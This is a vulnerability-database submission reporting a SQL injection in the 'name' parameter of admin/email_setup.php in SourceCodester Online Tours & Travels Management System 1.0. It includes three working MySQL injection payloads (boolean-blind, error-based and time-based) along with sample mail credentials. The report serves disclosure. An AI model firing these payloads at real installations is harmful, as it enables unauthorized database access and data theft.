Submit #249801: SourceCodester SourceCodester Online Tours & Travels Management System 1.0 Sql injectioninfo

TitleSourceCodester SourceCodester Online Tours & Travels Management System 1.0 Sql injection
DescriptionSourceCodester Online Tours & Travels Management System email_setup.php sql injection Url: admin/email_setup.php Abstract: Line 37 of email_setup.php invokes a SQL query built using unvalidated input. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands. Explanation: SQL injection errors occur when: Data enters a program from an untrusted source. The data is used to dynamically construct a SQL query. In this case the data is passed to prepare() in email_setup.php at line 37. Parameter: name (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: name=Mayuri K.' RLIKE (SELECT (CASE WHEN (6196=6196) THEN 0x4d6179757269204b2e ELSE 0x28 END)) AND 'uWJN'='uWJN&mail_driver_host=mail.gmail.com&mail_port=587&[email protected]&mail_password=programmers324&update= Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: name=Mayuri K.' AND EXTRACTVALUE(6478,CONCAT(0x5c,0x71706a7671,(SELECT (ELT(6478=6478,1))),0x717a6b6a71)) AND 'UqZk'='UqZk&mail_driver_host=mail.gmail.com&mail_port=587&[email protected]&mail_password=programmers324&update= Type: time-based blind Title: MySQL >= 5.0.12 RLIKE time-based blind Payload: name=Mayuri K.' RLIKE SLEEP(5) AND 'beie'='beie&mail_driver_host=mail.gmail.com&mail_port=587&[email protected]&mail_password=programmers324&update= Download Code: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html
Source⚠️ https://blog.csdn.net/xitanging/article/details/134903112
User
 zhouwenjie1221 (UID 59880)
Submission12/09/2023 17:10 (3 years ago)
Moderation12/13/2023 10:23 (4 days later)
StatusAccepted
VulDB entry247895 [SourceCodester Online Tours & Travels Management System 1.0 email_setup.php prepare Name sql injection]
Points20

PreviousOverviewNext

Interested in the pricing of exploits?

See the underground prices here!